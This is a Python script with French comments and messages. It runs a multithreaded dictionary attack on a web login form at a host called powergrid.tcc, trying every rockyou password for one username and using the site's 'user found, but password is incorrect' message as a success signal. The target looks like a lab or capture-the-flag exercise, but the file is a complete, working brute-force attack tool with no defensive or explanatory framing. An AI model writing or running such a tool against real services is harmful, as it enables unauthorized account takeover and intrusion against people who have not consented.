import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
import sys
import signal

# === CONFIGURATION ===
TARGET_URL = "http://wwwhost-new.powergrid.tcc:8000/app/login.php?lang=en"
USERNAME = "test"
ROCKYOU_PATH = "/usr/share/SecLists-master/Passwords/rockyou.txt"

ERROR_MSG = "User found, but password is incorrect."
LOGIN_FORM_MARKER = '<form action="login.php" method="post">'

HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
}

# Variable globale pour arrêter les threads
found = False

def try_password(password):
    global found
    if found:
        return None  # Arrêt anticipé

    pwd = password.strip()
    if not pwd:
        return None

    data = {
        "username": USERNAME,
        "password": pwd,
    }
    try:
        response = requests.post(
            TARGET_URL,
            data=data,
            headers=HEADERS,
            timeout=8,
            allow_redirects=True
        )

        # On ne considère que les réponses 200 SANS message d'erreur ET SANS formulaire
        if (
            response.status_code == 200
            and ERROR_MSG not in response.text
            and LOGIN_FORM_MARKER not in response.text
        ):
            found = True
            print(f"\n\n[+] 🎯 MOT DE PASSE VALIDE TROUVÉ : {pwd}\n")
            print("[+] Réponse du serveur (extrait) :")
            print(response.text[:500] + ("..." if len(response.text) > 500 else ""))
            print("\n[!] Arrêt de tous les threads...")
            return pwd

    except Exception:
        pass  # Timeout, proxy down, etc. → on ignore

    return None

def main():
    global found
    try:
        with open(ROCKYOU_PATH, "r", encoding="latin-1") as f:
            passwords = [line for line in f if line.strip()]
    except FileNotFoundError:
        print(f"[!] Fichier non trouvé : {ROCKYOU_PATH}")
        sys.exit(1)

    print(f"[*] Démarrage du bruteforce sur {len(passwords)} mots de passe (login: {USERNAME})")
    print("[*] Utilisation de 10 threads... Appuie sur Ctrl+C pour arrêter.\n")

    try:
        with ThreadPoolExecutor(max_workers=10) as executor:
            # Soumettre toutes les tâches
            future_to_password = {
                executor.submit(try_password, pwd): pwd for pwd in passwords
            }

            count = 0
            for future in as_completed(future_to_password):
                count += 1
                if found:
                    executor.shutdown(wait=False, cancel_futures=True)
                    break

                # Affichage de progression (toutes les 2000 tentatives)
                if count % 2000 == 0:
                    print(f"[+] {count} mots de passe testés...")

    except KeyboardInterrupt:
        print("\n[!] Interruption manuelle.")
        sys.exit(0)

    if not found:
        print("[-] Aucun mot de passe valide trouvé.")

if __name__ == "__main__":
    main()
